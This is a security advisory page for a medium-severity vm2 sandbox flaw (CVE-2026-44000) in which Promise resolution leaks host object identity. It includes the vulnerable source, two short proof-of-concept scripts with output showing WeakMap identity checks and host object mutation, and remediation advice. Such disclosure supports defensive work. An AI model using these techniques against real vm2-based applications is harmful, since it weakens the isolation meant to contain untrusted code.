vm2 CVE-2026-44000
MEDIUMSeverity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
A sandbox boundary violation in vm2 allows host object identity to cross into the sandbox through host Promise resolution.
When a host-side Promise that resolves to a host object is exposed to the sandbox, the value delivered to the sandbox .then() callback preserves host identity. This allows the sandbox to interact with the host object directly, including:
- Performing identity checks using host-side
WeakMap - Mutating host object state from inside the sandbox
This behavior occurs because the Promise fulfillment wrapper uses ensureThis() instead of the stronger cross-realm conversion path (from() / proxy wrapping). If no prototype mapping is found, ensureThis() returns the original object.
As a result, objects resolved by host Promises can cross the sandbox boundary without proper isolation.
---
Details
In setup-sandbox.js, vm2 wraps Promise.prototype.then:
globalPromise.prototype.then = function then(onFulfilled, onRejected) {
resetPromiseSpecies(this);
if (typeof onFulfilled === 'function') {
const origOnFulfilled = onFulfilled;
onFulfilled = function onFulfilled(value) {
value = ensureThis(value);
return apply(origOnFulfilled, this, [value]);
};
}
return apply(globalPromiseThen, this, [onFulfilled, onRejected]);
};
The wrapper calls ensureThis(value) before invoking the sandbox callback.
However, ensureThis is implemented in bridge.js as thisEnsureThis():
function thisEnsureThis(other) {
const type = typeof other;
switch (type) {
case 'object':
if (other === null) return null;
case 'function':
let proto = thisReflectGetPrototypeOf(other);
if (!proto) {
return other;
}
while (proto) {
const mapping = thisReflectApply(thisMapGet, protoMappings, [proto]);
if (mapping) {
const mapped = thisReflectApply(thisWeakMapGet, mappingOtherToThis, [other]);
if (mapped) return mapped;
return mapping(defaultFactory, other);
}
proto = thisReflectGetPrototypeOf(proto);
}
return other;
If no prototype mapping is found, ensureThis() simply returns the original object:
return other;
This means the sandbox receives the original host object instead of a proxied or sanitized representation.
Because of this behavior, values resolved by host Promises can cross the host-sandbox boundary with identity preserved.
PoC
The following Proof of Concept demonstrates that an object resolved by a host Promise can be used as a valid key in a host-side WeakMap from inside the sandbox.
WeakMap keys rely on reference identity, so a successful lookup proves that the sandbox received the host object identity.
PoC Code
import {VM} from "./index.js";
const hostObj = {tag: "HOST_OBJ"};
const hostPromise = Promise.resolve(hostObj);
// WeakMap created on the host
const wm = new WeakMap([[hostObj, "HIT"]]);
const vm = new VM({
sandbox: {hostPromise, wm},
timeout: 1000,
eval: false,
wasm: false,
});
const code = `
hostPromise.then(v => ({
weakMapGet: wm.get(v),
typeofV: typeof v,
tag: v.tag
}))
`;
const result = await vm.run(code);
console.log("VM RESULT:", result);
console.log("HOST SAME KEY STILL:", wm.get(hostObj));
Output
VM RESULT: { weakMapGet: 'HIT', typeofV: 'object', tag: 'HOST_OBJ' }
HOST SAME KEY STILL: HIT
This confirms that the object delivered to the sandbox callback retains host identity.
Additional Demonstration: Host Object Mutation
The sandbox can also mutate host object state through the resolved Promise value.
import {VM} from "./index.js";
const hostObj = {tag: "HOST_OBJ", nested: {x: 1}};
const hostPromise = Promise.resolve(hostObj);
const vm = new VM({
sandbox: {hostPromise},
timeout: 1000,
eval: false,
wasm: false,
});
const code = `
hostPromise.then(v => {
v.nested.x = 999;
v.tag = "MUTATED";
return { seenTag: v.tag, seenX: v.nested.x };
})
`;
const result = await vm.run(code);
console.log("VM RESULT:", result);
console.log("HOST AFTER:", hostObj);
**Output:**
VM RESULT: { seenTag: 'MUTATED', seenX: 999 }
HOST AFTER: { tag: 'MUTATED', nested: { x: 999 } }
This demonstrates write-through mutation of a host object from sandbox code.
**Impact**
This vulnerability allows host object references to cross the vm2 sandbox boundary via Promise resolution.
Consequences include:
Host object identity disclosure
Write-through mutation of host objects
WeakMap / WeakSet identity oracle across the boundary
Potential capability leaks if sensitive host objects are reachable via Promises
Applications that expose host Promises to sandboxed code may unintentionally grant the sandbox direct access to host objects.
This weakens the intended isolation guarantees of vm2.AnalysisAI
Host object identity crosses the vm2 sandbox boundary when Promise resolution delivers objects to sandbox callbacks, allowing sandboxed code to mutate host objects and perform identity checks via WeakMap. The vulnerability stems from Promise.prototype.then wrapping that uses ensureThis() for conversion instead of stronger cross-realm proxying; when no prototype mapping exists, ensureThis() returns the original host object unmodified. This sandbox escape affects vm2 versions up to 3.10.5 and is fixed in 3.11.0.
Technical ContextAI
vm2 is a Node.js sandbox library that isolates untrusted code execution by creating a separate JavaScript realm. The vulnerability exploits a flaw in the Promise.prototype.then wrapper in setup-sandbox.js. When a host-side Promise resolves to a host object, the fulfillment callback receives the value after ensureThis() processing (defined in bridge.js). ensureThis() traverses the object's prototype chain looking for registered mappings in the protoMappings structure. If a mapping is found, the object is properly wrapped or proxied. However, if no mapping exists-which is typical for plain host objects-ensureThis() returns the original object unchanged (return other;) instead of applying the stronger from() cross-realm conversion path that would wrap it. This allows direct host object references to leak into the sandbox realm, violating the sandbox boundary. The CWE-668 (Exposure of Resource to Wrong Sphere) classification reflects this domain-crossing failure. The npm package vm2 uses this Promise interception as a sandbox isolation mechanism, making this a critical architectural flaw.
RemediationAI
Upgrade vm2 to version 3.11.0 or later immediately. This release includes the security fix (GHSA-mpf8-4hx2-7cjg) along with 12 additional sandbox-escape RCE fixes and hardening measures. For applications unable to upgrade immediately, avoid passing host-side Promises that resolve to host objects into sandbox code; instead, resolve the Promise on the host side and pass only the final value (after sanitization if needed). If Promise exposure is unavoidable, wrap resolved values explicitly with a proxy or serialization layer before the Promise callback is invoked. However, these workarounds do not replace the upstream patch and should only be temporary mitigations. The vendor notes that embedders running untrusted code should prioritize this upgrade.
Same weakness CWE-668 – Exposure of Resource to Wrong Sphere
View allSame technique Information Disclosure
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-mpf8-4hx2-7cjg